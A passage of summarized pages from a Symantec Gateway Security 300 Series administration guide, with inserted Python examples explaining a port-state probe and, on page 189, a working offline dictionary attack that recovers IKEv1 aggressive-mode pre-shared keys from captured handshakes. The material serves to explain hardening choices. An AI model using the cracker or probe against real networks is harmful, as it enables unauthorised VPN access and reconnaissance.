    LiveUpdate directly for their AV updates, decide which client to designate as the master. The master should always be turned on, have an active Symantec antivirus client, and have a connection to the Internet where it can download virus definition updates.
  • Page 107: Enabling Avpe

    ■ To check a client’s antivirus configuration to verify that the correct version of a supported Symantec antivirus product is installed on the client’s workstation. To enable the appliance to validate whether a client is using the latest virus definitions, check Verify Latest Virus Definitions.
  • Page 108 To enable AVpe After you have configured AVpe, you must enable it for each computer or VPN group. Note: Enabling AVpe for VPN groups is for WAN clients only. You enable AVpe for LAN VPN clients through Computer groups in the Firewall section. “Defining computer group membership”...
  • Page 109: Configuring The Antivirus Clients

    When you uninstall the client software, the registry keys that are created by this procedure are also removed. Warning: Do not use this procedure for clients managed by a Symantec AntiVirus server. To configure the AV clients Install or configure each client’s supported Symantec antivirus product in unmanaged mode.
  • Page 110: Log Messages

    On the View Log tab, click Refresh. Verifying AVpe operation After you have enabled AVpe, you can test its operation by disabling Symantec AntiVirus Corporate Edition in a client workstation and then attempting to connect to the local network. If antivirus policy enforcement is properly configured, in the absence of enabled Symantec antivirus software, all connection attempts should be blocked or warned.
  • Page 111: About Content Filtering

    If this message is present, then your AVpe feature is correctly configured and operational. If you are able to connect to www.symantec.com, recheck your AVpe configuration settings and group assignments. Make sure that you uninstalled Symantec AntiVirus Corporate Edition from the client workstation, and that the client is a member of a group with AVpe enabled, with connections blocked.
  • Page 112: Managing Content Filtering Lists

    For wild card functionality, specify only the domain name in the allow or deny list for specific sites. For example, to allow traffic to any Symantec site, add symantec.com to the allow list. This allows traffic to liveupdate.symantec.com, www.symantec.com, fileshare.symantec.com, and so on.
  • Page 113: Enabling Content Filtering For Lan

    In the Input URL text box, type the name of a site you want to add to the list. For example, yoursite.com or mysite.com/pictures/me.html. Click Add. Repeat the previous two steps until you have all your URLs added to the list. Click Save List.
  • Page 114: Monitoring Content Filtering

    Monitoring content filtering Content filtering logs a message in the log files if packets are dropped due to a user attempting to access a URL on the deny list, or attempting to access a URL that is not specifically permitted on the allow list.
  • Page 115: Preventing Attacks

    ■ Enabling advanced protection settings The Symantec Gateway Security 300 Series appliance provides intrusion detection and prevention services (IDS and IPS). The IDS and IPS functions are enabled by default, and provide atomic packet protection. You may disable IDS and IPS functionality at any time.
  • Page 116: Trojan Horse Protection

    one attack in five seconds. When ICMP is enabled, the log messages are not limited. The appliance defends against the following atomic IDS/IPS signatures: ■ Bonk ■ Back Orifice (Trojan horse communication channel) ■ Girlfriend (Trojan horse communication channel) ...
  • Page 117: Enabling Advanced Protection Settings

    Block/Don’t Warn: Drop the packet, but do not log. You can configure the following options for enabling and disabling IDS/IPS signature detection and logging: ■ Select All to enable or disable detection of ALL signatures. ...
  • Page 118: Tcp Flag Validation

    Certain port mapping tools, such as NMAP, use invalid TCP flag combinations to detect a firewall on a network or map the security policy implemented on the firewall. Symantec Gateway Security 300 Series blocks and logs any traffic with illegal flag combinations for traffic that is not being denied by the security policy.
  • Page 119: Logging, Monitoring And Updates

    Chapter Logging, monitoring and updates This chapter includes the following topics: ■ Managing logging ■ Updating firmware ■ Backing up and restoring configurations ■ Interpreting LEDs ■ LiveUpdate and firmware upgrade LED sequences The appliance provides configurable system logging features for viewing the system logs and monitoring system status.
  • Page 120: Configuring Log Preferences

    Configuring log preferences Logging preferences let you set the way that you view log messages, the amount of logging that is performed, and what to do when the log becomes full. The following settings help you create logging scenarios that are appropriate to your network’s needs: ■ Emailing log messages ...
  • Page 121 ■ Serial WAN port (PPPoE or Analog) ■ WAN Link up (connected) ■ WAN Link down (disconnected) A GET is a request from the SNMP server for status information from the Symantec Gateway Security 300 Series appliance. The appliance supports all...
  • Page 122 SNMP v1 MIBs (information variables) using GETs. A TRAP is status information sent from the Symantec Gateway Security 300 Series appliance to the SNMP server. Configuring SNMP sets the IP addresses of the SNMP servers that receive status information (TRAP) alerts from the SNMP agent running on the appliance.
  • Page 123 To verify SNMP communication ◆ Contact the SNMP server administrator and have them send a GET from the SNMP server to your appliance. The appliance responds by sending status information to the SNMP server. If it does not respond, check that the SNMP server IP address and community string are correct.
  • Page 124: Managing Log Messages

    A non-destructive firmware update updates the firmware but keeps the configurations intact. Symantec periodically releases updates to the firmware. There are three ways to update the firmware on your appliance: automatically using the Scheduler in...
  • Page 125: Automatically Updating Firmware

    Updating firmware LiveUpdate, manually using LiveUpdate, or manually by receiving firmware from Symantec Technical Support and applying it using the symcftpw tool. By default, LiveUpdate checks for updates at the end of the Setup Wizard. You may disable this feature. See the Symantec Gateway Security 300 Series Installation Guide.
  • Page 126 LiveUpdate optional settings let you configure a connection to a LiveUpdate server through an HTTP proxy server. Use this feature only in the following situations: ■ The appliance is located behind a Symantec Gateway Security appliance using an HTTP proxy server.
  • Page 127 Symantec LiveUpdate Administration Utility. Rather than the appliance contacting the Symantec servers to obtain product updates, the appliance can contact the LiveUpdate server on the local network. This greatly reduces network traffic and increases transfer speeds. It also lets you stage, manage, and...
  • Page 128 and instructions for installation are available on the Symantec Technical Support Web page http://www.symantec.com/techsupp/. Figure 9-1 shows several possible LiveUpdate configurations. Figure 9-1 LiveUpdate configurations (figure; labelled components include Symantec LiveUpdate server and Symantec Gateway Security 5400 Series...)
  • Page 129: Upgrading Firmware Manually

    Firmware upgrades are available from Symantec's Web site. If you do not configure LiveUpdate to automatically download and apply firmware upgrades, or if you are instructed to manually perform an upgrade by Symantec Technical Support, you should check the Symantec Web site for the latest version of the firmware.
  • Page 130: Flashing The Firmware

    Apply the firmware by using the Symantec FTP utility (included on the Symantec Gateway Security 300 Series CD-ROM), or you can use the DOS TFTP command with the -i (binary) option. This transfers the firmware file to the appliance, applies it, and then restarts the appliance.
  • Page 131 Figure 9-5 shows the rear panel of models 360 and 360R. This graphic is for reference; the full description of each feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-3 Model 360 and 360R rear panel...
  • Page 132 Do this only if flashing firmware as instructed in “Flashing the firmware” on page 130 does not work, or if you are instructed to do so by Symantec Technical Support. Use Figure 9-6 and Figure 9-7 for reference in the following procedure.
  • Page 133: Checking Firmware Update Status

    HTTP error message reported by the HTTP client. To check firmware update status Knowing the version of the firmware on the appliance is important if you plan to contact Symantec Technical Support. “LiveUpdate tab field descriptions” on page 159.
  • Page 134 Backing up and restoring configurations Note: You should not use a configuration backup file from an older version of the firmware to restore your settings unless instructed to do so by Symantec Technical Support. The backup file is created in the same folder on your hard drive where you put the symcftpw application.
  • Page 135: Resetting The Appliance

    The firmware resets to the last all.bin firmware file that was used to flash the appliance. This is either the factory firmware or a firmware upgrade that you downloaded from the Symantec Web site and applied to the appliance. Note: LiveUpdate does not download and apply all.bin firmware upgrades.
  • Page 136: Interpreting Leds

    Model 320 rear panel Figure 9-5 shows the rear panel of models 360 and 360R. This graphic is for reference; the full description of each feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-5 Model 360 and 360R rear panel To perform a basic reset On the rear panel of the appliance, quickly press the reset button (1).
  • Page 137 Security WLAN Access Point option is inserted. Figure 9-4 shows the rear panel on model 320. This graphic is for reference; the full description of each feature is available in the Symantec Gateway Security 300 Series Installation Guide. Figure 9-6...
  • Page 138 Table 9-2 LEDs (Location / Symbol / Feature / Description): Error: Illuminates if there is a problem with the appliance. Transmit: Illuminates or flashes when traffic is being passed over the LAN or WAN ports. Backup: Illuminates or flashes when the serial port is being used or is not functioning correctly.
  • Page 139: Liveupdate And Firmware Upgrade Led Sequences

    Table 9-3 LED states and appliance status (Error LED (2) state / Transmit LED (3) state / Appliance status):
    Solid on / Solid on: Hardware problem.
    Flashing once / Solid off: RAM error.
    Flashing twice / Solid off: Timer error.
    Flashing three times / Solid off: DMA error.
  • Page 141: Appendix A Troubleshooting

    The Debug information feature provides a high level of detail of the system events information in the log. Debug mode gives more detailed information in the status log that is useful for Symantec Technical Support or for troubleshooting. The default user mode provides general information about actions taken as defined by the security policy.
  • Page 142 To troubleshoot Symantec Gateway Security 300 Series appliances ■ “Logging/Monitoring field descriptions” on page 151. ■ “Troubleshooting tab field descriptions” on page 156. To set logging levels In the SGMI, in the left pane, click Logging/Monitoring.
  • Page 143: Accessing Troubleshooting Information

    Under Product Support > enterprise, click Continue. On the Support enterprise page, under Technical Support, click knowledge base. Under select a knowledge base, scroll down and click Symantec Gateway Security 300 Series. Click your specific product name and model. On the knowledge base page for your appliance model, do any of the...
  • Page 144 ■ On the Browse tab, expand a heading to see knowledge base articles related to that topic.
  • Page 145: Appendix B Licensing

    300 Series Client-to-Gateway VPN functions Symantec Client VPN software may be licensed for an appliance. The Symantec Client VPN software version must be listed as supported in the Symantec Gateway Security 300 Series Release Notes. The Client-to-Gateway VPN add-on is licensed by the maximum number of concurrent VPN sessions allowed. The appliance comes with a license for one Client-to-Gateway VPN session.
  • Page 146: Symantec Gateway Security Appliance License And Warranty Agreement

    Software that the Licensor may furnish to You. Except as may be modified by a Symantec license certificate, license coupon, or license key (each a "License Module") which accompanies, precedes, or follows this license, and as may be...
  • Page 147: Limited Warranty

    (30) days from the date of original purchase of the Appliance. Your sole remedy in the event of a breach of this warranty will be that Symantec will, at its option, repair or replace any defective Software returned to Symantec within the warranty period or refund the money You paid for the Appliance.
  • Page 148 Appliance, Symantec will return such repaired or replacement Appliance to You, freight and insurance prepaid. In the event that Symantec, in its sole discretion, determines that it is unable to replace or repair the Hardware, Symantec will refund to You the F.O.B.
  • Page 149 Symantec products to any military entity not approved under the EAR, or to any other entity for any military purpose, nor will it sell any Symantec product for use in connection with chemical, biological, or nuclear weapons or missiles capable of delivering such weapons.
  • Page 151: Appendix C Field Descriptions

    ■ Content filtering field descriptions Logging/Monitoring field descriptions The Symantec Gateway Security 300 Series provides configurable system logging features and tabs for viewing the system logs and monitoring system status. It also has built-in testing tools for troubleshooting and connectivity verification.
  • Page 152: Status Tab Field Descriptions

    Status tab field descriptions The Status tab shows the current conditions and settings of the security gateway. Table C-1 Status tab field descriptions (Section / Field / Description): Model 320: WAN (External Port): Connection Status: Displays whether the WAN port is connected or disconnected to the Internet or an internal network.
  • Page 153 Table C-1 Status tab field descriptions (Continued): LAN (External Port): IP Address: Displays the IP address of the security gateway. The default value is 192.168.0.1. Physical Address: Displays the physical address (MAC) of the security gateway’s LAN port.
  • Page 154: View Log Tab Field Descriptions

    View Log tab field descriptions The View Log tab shows a list of system events. Table C-2 View Log field descriptions (Section / Field / Description): View Log: UTC Time: Coordinated Universal Time (UTC), which is the Greenwich Mean Time at which the message was logged.
  • Page 155: Log Settings Tab Field Descriptions

    Log Settings tab field descriptions The Log Settings tab lets you configure settings that control email notification, the types of messages that are logged, and the time listed for each log message. Table C-3 Log Settings field descriptions (Section / Field / Description)...
  • Page 156: Troubleshooting Tab Field Descriptions

    Table C-3 Log Settings field descriptions (Continued): Log Type: System activity, connection status: Logs all system activity and connection status. This type is checked by default. Connections ALLOWED by policies: Logs all connections allowed by outbound rule.
  • Page 157: Administration Field Descriptions

    Table C-4 Troubleshooting tab field descriptions (Continued): Testing Tools: Target Host: IP address or fully qualified domain name of the host you are testing with one of the tools. The address is not validated, so ensure that you type the address accurately.
  • Page 158: Basic Management Tab Field Descriptions

    Basic Management tab field descriptions The Basic Management tab helps you control access to the SGMI with the administration password and allowed IP addresses. Table C-5 Basic Management tab field descriptions (Section / Field / Description): Administration: admin’s Password: Password used to access the SGMI.
  • Page 159: Liveupdate Tab Field Descriptions

    LiveUpdate Server IP address or fully qualified domain name of the LiveUpdate server from which to get firmware updates. The default address is http://liveupdate.symantec.com. Automatic Updates Enable Scheduler Enables the LiveUpdate scheduler. This lets you schedule times for the security gateway to automatically check for firmware updates, and then apply them.
  • Page 160: Lan Field Descriptions

    Table C-7 LiveUpdate tab field descriptions (Continued): Optional Settings: HTTP Proxy Server: Enables the security gateway to contact the LiveUpdate server through an HTTP proxy server. Proxy Server Address: IP address of the HTTP proxy server through which the LiveUpdate server gets the firmware updates.
  • Page 161: Lan Ip & Dhcp Tab Field Descriptions

    LAN IP & DHCP tab field descriptions The LAN IP & DHCP tab lets you set the security gateway’s IP address and configure the security gateway to act as a DHCP server. Table C-8 LAN IP & DHCP tab field descriptions (Section / Field / Description)...
  • Page 162: Port Assignment Tab Field Descriptions

    WAN/ISP field descriptions The Symantec Gateway Security 300 Series WAN/ISP functionality provides connections to the outside world. This can be the Internet, a corporate network, or any other external private or public network. WAN/ISP functionality can also be configured to connect to an internal LAN when the security gateway is protecting an internal subnet.
  • Page 163 ■ Main Setup tab field descriptions ■ Static IP & DNS tab field descriptions ■ PPPoE tab field descriptions ■ Dial-up Backup & Analog/ISDN tab field descriptions ■ PPTP tab field descriptions ■ Dynamic DNS tab field descriptions ...
  • Page 164: Main Setup Tab Field Descriptions

    Main Setup tab field descriptions On the Main Setup tab, you select your connection type and configure the security gateway’s identification settings. Table C-10 Main Setup tab field descriptions (Section / Fields / Description): Model 320: Connection Type: The following connection types are supported: Connection Type...
  • Page 165: Static Ip & Dns Tab Field Descriptions

    Table C-10 Main Setup tab field descriptions (Continued): Optional Network Settings: Host Name: Name of the security gateway on the network. A default value based on the model number and the MAC address is provided in the Setup Wizard.
  • Page 166: Pppoe Tab Field Descriptions

    PPPoE tab field descriptions Use the PPPoE tab to configure the security gateway to connect to the Internet with an account that uses PPPoE for authentication. Table C-12 PPPoE tab field descriptions (Section / Field / Description): Model 320: WAN Port (Model...
  • Page 167: Dial-Up Backup & Analog/Isdn Tab Field Descriptions

    Field descriptions WAN/ISP field descriptions Table C-12 PPPoE tab field descriptions (Continued) Section Field Description Choose Service Query Services When you click Query Services, the security gateway connects to your ISP and determines which services are available. You must disconnect from your PPPoE account before using this feature.
  • Page 168 Table C-13 Dial-up or ISDN tab field descriptions (Continued): ISP Account Information: User Name: User name for the dial-up account. Password: Password for the dial-up account. Verify Password: Retype the password for the dial-up account. IP Address: If you have a static IP address with your ISP, type it here.
  • Page 169 Table C-13 Dial-up or ISDN tab field descriptions (Continued): Modem Settings: Model: Model type of your modem. If your specific model type is not listed, click Other. Initialization String: Modem command that the security gateway sends to the modem to begin dialing the ISP.
  • Page 170 Table C-13 Dial-up or ISDN tab field descriptions (Continued): Analog Status: Port Status: Describes the status of the serial port on the security gateway where the modem is connected. Possible port status includes: ■ Idle ...
  • Page 171: Pptp Tab Field Descriptions

    Field descriptions WAN/ISP field descriptions PPTP tab field descriptions Configure the security gateway to connect to the Internet with an account that uses PPTP for authentication. Table C-14 PPTP tab field descriptions Section Field Description WAN Port: Model WAN Port(Model WAN port for which you are configuring PPTP.
  • Page 172 WAN port to configure dynamic DNS. 360/360R) Force DNS Update: Sends updated IP information to the dynamic DNS service. Do this only if requested by Symantec Technical Support. TZO Dynamic DNS Service: Alphanumeric string of characters that acts as a password for the TZO account.
  • Page 173 Field descriptions WAN/ISP field descriptions Table C-15 Dynamic DNS tab field descriptions (Continued) Section Field Description Standard Service User Name User name for the account that you create with a dynamic DNS service. Password Password for the account that you create with a dynamic DNS service.
  • Page 174: Routing Tab Field Descriptions

    Routing tab field descriptions Use the routing table to configure static or dynamic routing for your security gateway. Table C-16 Routing tab field descriptions (Section / Field / Description): Dynamic Routing: Enable RIP v2: Enables dynamic routing. Use this only for intranet or department gateways.
  • Page 175: Advanced Tab Field Descriptions

    Advanced tab field descriptions Use the Advanced tab to configure optional connection settings and the DNS gateway. Table C-17 Advanced tab field descriptions (Section / Field / Description): Load Balancing (Model 360/360R): WAN 1 Load: Percentage of traffic to pass through WAN 1. The remainder of traffic passes through WAN 2.
  • Page 176: Firewall Field Descriptions

    ISP’s DNS servers as a backup. Firewall field descriptions The Symantec Gateway Security 300 Series security gateway includes firewall technology that lets you define the inbound and outbound rules governing the traffic that passes through the security gateway. When configuring the firewall you need to identify all nodes (computers) that are protected on your network.
  • Page 177: Computers Tab Field Descriptions

    ■ Services tab field descriptions ■ Special Application tab field descriptions ■ Advanced tab field descriptions Computers tab field descriptions Before configuring outbound or inbound rules, you must identify the nodes on the Computers tab. Table C-18 Computers tab field descriptions (Section...
  • Page 178 Table C-18 Computers tab field descriptions (Continued): Application Server: Reserve Host: Adds the MAC address (that you specified in the Adapter (MAC) Address text box) to the appliance’s DHCP server so it is always assigned to the IP address that you specify in the IP Address text box.
  • Page 179: Computer Groups Tab Field Descriptions

    ■ A client with non-compliant virus software or virus definitions is denied access to the external network. The client is allowed access to the Symantec Antivirus CE Server or LiveUpdate server to bring their virus definitions into compliance. Content Filtering...
  • Page 180: Inbound Rules Field Descriptions

    Table C-19 Computer Groups tab field descriptions (Continued): Access Control (Outbound Rules): No restrictions: A host assigned to this group may pass any traffic to the external network. You do not need to define rules for access groups in this category.
  • Page 181: Outbound Rules Tab Field Descriptions

    Table C-20 Inbound Rules field descriptions (Continued): Rule Definition: Name: Type a new name when adding a rule. Enable Rule: Check to enable the inbound rule. Application Server: Shows the configured application servers available for inbound rules.
  • Page 182: Services Tab Field Descriptions

    Services tab field descriptions Define the services to be used in the outbound and inbound firewall rules on the Services tab. Table C-22 Services tab field descriptions (Section / Field / Description): Services: Application: Select an application available for services to edit or delete.
  • Page 183: Special Application Tab Field Descriptions

    Table C-22 Services tab field descriptions (Continued): Service List: Name: Name of the service. Protocol: Protocol associated with the service. Listen on Start Port: First port in the range to listen on. Listen on End Port: Last port in the range to listen on.
  • Page 184 Table C-23 Special Applications tab field descriptions (Continued): Special Application Settings: Name: Name of the special application. Enable: Enables the special application for all computer groups. Outgoing Protocol: Protocol for the outgoing packets. Options include: ■...
  • Page 185 Table C-23 Special Applications tab field descriptions (Continued): Special Application List: Name: Name of the special application. Enabled: Indicates whether the special application is enabled for all computer groups. Outgoing Protocol: Protocol for the outgoing packets. Outgoing Start: First port in the range of outgoing ports.
  • Page 186: Advanced Tab Field Descriptions

    Advanced tab field descriptions. You configure advanced firewall settings, such as IPsec pass-thru, on the Advanced tab.
    Table C-24 Advanced tab field descriptions
    Optional Security Settings, Enable IDENT Port: Disabling the IDENT port makes port 113 closed, not stealth (not open). A closed port still answers a probe with a TCP reset, which confirms that a host is present at that address; only a stealth port gives no response at all.
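The closed-versus-stealth distinction in the Enable IDENT Port field is easy to verify from outside. The following is an added example written for this page, not code from the Symantec guide: it classifies a TCP port as open, closed or stealth from the outcome of a plain connect() (refused means a reset came back, a timeout means nothing did), and demonstrates the open and closed cases against a loopback listener it opens itself. The loopback host, the timeout value and the 203.0.113.1 address in the usage comment are assumptions.

```python
"""Added example (not from the Symantec guide): distinguishing a closed port from a
stealth one, which is the distinction the Enable IDENT Port field turns on.

Nothing listens on either kind of port, but a scanner sees a difference: a closed
port answers the connection attempt with a TCP reset (connection refused), which
confirms that a host is present at that address; a stealth port silently drops
the packet and the probe times out. A plain connect() is enough to tell them
apart, so no raw sockets or privileges are needed. The loopback host and the
timeout are assumptions made for the demonstration.
"""
import socket
from contextlib import closing

IDENT_PORT = 113


def probe_tcp(host: str, port: int, timeout: float = 2.0) -> str:
    """Classify host:port as 'open', 'closed', 'stealth' or 'unreachable'."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"       # RST came back: a host is there, nothing listens
        except (socket.timeout, TimeoutError):
            return "stealth"      # no reply at all before the timeout
        except OSError:
            return "unreachable"  # no route, host unreachable, and similar
        return "open"             # handshake completed: something is listening


def demo_local_states(host: str = "127.0.0.1") -> tuple:
    """Show 'open' while a loopback listener exists and 'closed' once it is gone.

    'stealth' cannot be produced locally without a packet filter that drops
    SYNs, which is exactly what the manual says the gateway does not do on
    port 113 when IDENT is disabled: the port is closed, not stealth.
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as listener:
        listener.bind((host, 0))      # port 0: let the OS pick a free port
        listener.listen(1)
        port = listener.getsockname()[1]
        while_listening = probe_tcp(host, port)
    after_close = probe_tcp(host, port)
    return while_listening, after_close


if __name__ == "__main__":
    print("loopback demo:", demo_local_states())   # ('open', 'closed')
    # Against a gateway, run from the WAN side (203.0.113.1 is a documentation
    # address standing in for the gateway's external IP):
    # print(probe_tcp("203.0.113.1", IDENT_PORT))  # expect 'closed' with IDENT disabled
```

Run the probe from outside the gateway against its WAN address on port 113 after toggling the field: with IDENT disabled the manual's description predicts 'closed', and an attacker sweeping address ranges learns from that reset that the address is live.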
  • Page 187: VPN Field Descriptions

    VPN gateway on the security gateway. Keep this setting at 2 SPI unless instructed by Symantec Technical Support to change it. The None setting lets VPN clients be used in exposed host mode if a client is having problems connecting from behind the security gateway.
  • Page 188

    VPNs are used to allow a single user or a remote network access to the protected resources of another network. The Symantec Gateway Security 300 Series security gateways support two types of VPN tunnels: Gateway-to-Gateway and Client-to-Gateway.
  • Page 189: Dynamic Tunnels Tab Field Descriptions

    Client VPN software typically negotiates in aggressive mode. The default value is Main Mode. Aggressive mode with a pre-shared key sends the peer identities and the responder's authentication hash unencrypted, so a captured exchange allows an offline dictionary attack on the key; use Main Mode whenever the peer supports it and choose long, random pre-shared keys.
    VPN Policy: Policy that dictates authentication, encryption, and timeout settings. The list contains Symantec pre-defined policies and any policies you created on the VPN Policies tab.
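Why the Main Mode default matters, and why road-warrior clients nevertheless use aggressive mode, is easiest to see by reproducing the attack. In Main Mode the responder cannot look up a per-user pre-shared key until it knows who the initiator is, and the identity arrives encrypted, so a PSK must be tied to the initiator's IP address; aggressive mode sends the identity and the responder's hash HASH_R in the clear, which is what makes it usable for clients on changing addresses and also what exposes the key. The block below is an added example written for this page, not code from the Symantec guide or from any Symantec product: it computes HASH_R from the RFC 2409 pre-shared-key derivation (SKEYID = prf(PSK, Ni | Nr), HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)) with HMAC-SHA1 as the PRF and runs a dictionary attack against a constructed capture. Every nonce, cookie, Diffie-Hellman value, payload body and candidate key is a constructed sample.

```python
"""Added example (not taken from the Symantec guide): why IKEv1 aggressive mode with
a pre-shared key (PSK) deserves a warning.

In Main Mode the identity and hash payloads are encrypted with keys derived from the
Diffie-Hellman exchange. In aggressive mode the responder's HASH_R is sent in the
clear, so a passive observer can test candidate PSKs offline. The derivations follow
RFC 2409 for PSK authentication with HMAC-SHA1 as the PRF:

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

Every field value below is a constructed sample, not a real capture.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Values a passive observer sees in aggressive-mode messages 1 and 2."""
    ni: bytes      # initiator nonce (Ni_b)
    nr: bytes      # responder nonce (Nr_b)
    g_xi: bytes    # initiator Diffie-Hellman public value
    g_xr: bytes    # responder Diffie-Hellman public value
    cky_i: bytes   # initiator cookie, 8 bytes
    cky_r: bytes   # responder cookie, 8 bytes
    sai_b: bytes   # body of the initiator's SA payload
    idir_b: bytes  # body of the responder's ID payload
    hash_r: bytes  # HASH_R exactly as the responder sent it, unencrypted


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 PRF instantiated as HMAC-SHA1 (the negotiated hash algorithm)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication: depends only on the PSK and nonces."""
    return prf(psk, ni + nr)


def responder_hash(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """HASH_R that a responder holding `psk` would produce for this exchange."""
    skeyid = skeyid_psk(psk, cap.ni, cap.nr)
    return prf(skeyid, cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b)


def crack_psk(cap: AggressiveModeCapture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: return the candidate whose HASH_R matches the capture."""
    for cand in candidates:
        if hmac.compare_digest(responder_hash(cand, cap), cap.hash_r):
            return cand
    return None


def make_sample_capture(psk: bytes) -> AggressiveModeCapture:
    """Build a deterministic, constructed capture for a responder that uses `psk`."""
    fields = dict(
        ni=bytes(range(16)),                   # constructed nonces
        nr=bytes(range(16, 32)),
        g_xi=bytes([0x33]) * 128,              # constructed 1024-bit DH public values
        g_xr=bytes([0x44]) * 128,
        cky_i=bytes.fromhex("0102030405060708"),
        cky_r=bytes.fromhex("1112131415161718"),
        # constructed SA payload body; its exact content does not matter here
        sai_b=bytes.fromhex("00000001000000010000002c010100010000002401010000800b0001800c0e10"),
        idir_b=b"\x01\x00\x00\x00" + b"\xc0\xa8\x01\x01",  # ID_IPV4_ADDR 192.168.1.1, constructed
    )
    partial = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=responder_hash(psk, partial), **fields)


if __name__ == "__main__":
    capture = make_sample_capture(b"hunter2")   # deliberately weak PSK for the demo
    wordlist = [b"password", b"letmein", b"hunter2", b"correct horse"]
    print("recovered PSK:", crack_psk(capture, wordlist))   # b'hunter2'
```

The attack costs one HMAC pair per candidate and needs no interaction with the gateway after the single captured exchange, which is why the strength of the pre-shared key is the only defence once aggressive mode is accepted. Extended user authentication (RADIUS after phase 1, described on page 198) does not protect the PSK itself.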
  • Page 190

    Table C-25 Dynamic Tunnels field descriptions
    Local Security Gateway, PPPoE Session: The default PPPoE session is Session 1. This requires an ISP PPPoE account. If you have a single-session PPPoE account, leave the PPPoE session at Session 1.
  • Page 191

    Table C-25 Dynamic Tunnels field descriptions
    Global Tunnel: Normally, only requests destined for the network protected by the remote VPN gateway are forwarded through the VPN. Other traffic, such as Web browsing, is forwarded straight out to the Internet.
  • Page 192

    Table C-25 Dynamic Tunnels field descriptions
    Remote Security Gateway, Gateway Address: IP address or fully qualified domain name of the remote gateway (the gateway to which the tunnel will connect). The maximum number of alphanumeric characters for this text box is 128.
  • Pages 193–194: Static Tunnels Tab Field Descriptions

    Static Tunnels tab field descriptions. This table describes the fields on the Static Tunnels tab that you use to configure static gateway-to-gateway VPN tunnels for the security gateway.
  • Page 195

    This value must match the incoming SPI on the remote end of the tunnel.
    VPN Policy: Policy that dictates authentication, encryption, and timeout settings. The list contains Symantec pre-defined policies and any policies you created on the VPN Policies tab.
  • Page 196

    Table C-26 Static Tunnel tab field descriptions (continued)
    Remote Security Gateway, Gateway Address: IP address or fully qualified domain name of the security gateway to which you are creating a tunnel. The maximum length for this field is 128 alphanumeric characters.
  • Page 197: Client Tunnels Tab Field Descriptions

    Client Tunnels tab field descriptions. Use the Client Tunnels tab to define client-to-gateway tunnels. Ensure that you have defined your users on the Client Users tab before defining the tunnel.
    Table C-27 Client tunnel tab definition field descriptions
  • Page 198

    Table C-27 Client tunnel tab definition field descriptions (continued)
    Extended User Authentication, Enable Extended User Authentication: Requires that all users in the selected VPN group use RADIUS for extended authentication after phase 1, but before phase 2.
  • Page 199: Client Users Tab Field Descriptions

    User Name: User name for the client user. The maximum number of alphanumeric characters for this value is 31. It must match the remote Client ID in Symantec Client VPN software. You can add up to 50 client users.
    Pre-Shared Key: ISAKMP (IKE) authentication key.
  • Page 200: VPN Policies Tab Field Descriptions

    Table C-29 VPN policies field descriptions
    IPsec Security Association (Phase 2) Parameters, VPN Policy: Select a policy to update or delete. Note: You cannot delete Symantec pre-defined policies. Options include:
    ■ ike_default_crypto
    ■ ike_default_crypto_strong
    ■ Static_default_crypto
    ■ ...
  • Page 201

    Table C-29 VPN policies field descriptions (continued)
    SA Lifetime: Time, in minutes, before phase 2 renegotiation of new encryption and authentication keys for the tunnel. The default value is 480 minutes. The maximum value is 2,147,483,647 minutes (the largest signed 32-bit integer); a lifetime anywhere near that effectively turns off phase 2 rekeying, so keep the default or a shorter value.
  • Page 202: Status Tab Field Descriptions

    Status tab field descriptions. The Status tab shows the status of your VPN tunnels and client users.
    Table C-30 Status tab field descriptions
    Dynamic VPN Tunnels, Status: Status of the selected tunnel.
    Dynamic VPN Tunnels, Name: Name of the selected tunnel.
  • Page 203: Advanced Tab Field Descriptions

    The maximum value is 31 alphanumeric characters.
    VPN Policy: VPN policy for VPN client tunnels for phase 2 tunnel negotiation. The list shows pre-defined Symantec policies and any policies you created on the VPN Policies tab.
    Dynamic VPN, Enable Dynamic ...
  • Page 204: IDS/IPS Field Descriptions

    The maximum value is 50 alphanumeric characters.
    IDS/IPS field descriptions. The Symantec Gateway Security 300 Series security gateway provides intrusion detection and prevention (IDS/IPS). The IDS/IPS functions are enabled by default, and provide atomic packet protection with spoof protection and IP ... You may disable IDS/IPS functionality at any time.

  • Page 205: IDS Protection Tab Field Descriptions

    ■ Port scan detection
    This section contains the following topics:
    ■ IDS Protection tab field descriptions
    ■ Advanced tab field descriptions
    IDS Protection tab field descriptions. Configure basic IDS protection on the IDS Protection tab.
    Table C-32 IDS Protection tab field descriptions
  • Page 206: Advanced Tab Field Descriptions

    Advanced tab field descriptions. Configure spoof protection on the Advanced tab.
    Table C-33 Advanced tab field descriptions
    IP Spoof Protection, LAN: Enables spoof protection on the LAN.
    IP Spoof Protection, WLAN/LAN: Enables spoof protection on the wireless LAN and LAN.
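The two IP Spoof Protection fields only say which interfaces the check applies to; the check itself is ingress source-address validation. The following added example, written for this page and not taken from the gateway's firmware or the guide, implements that validation over a constructed addressing plan: a packet is dropped when its source address cannot legitimately arrive on the interface that received it. The interface names, the prefixes, the sample packets and the WAN-side rule (drop outside traffic that claims an internal or loopback source) are assumptions; the LAN and WLAN toggles mirror the two fields in the table.

```python
"""Added example (not the gateway's own code): the ingress check behind the
IP Spoof Protection fields on the IDS/IPS Advanced tab.

A packet counts as spoofed when its source address cannot legitimately arrive
on the interface that received it: traffic from the WAN claiming an internal
or loopback source, or traffic on the LAN or WLAN whose source lies outside
that segment. The addressing plan, interface names and sample packets are
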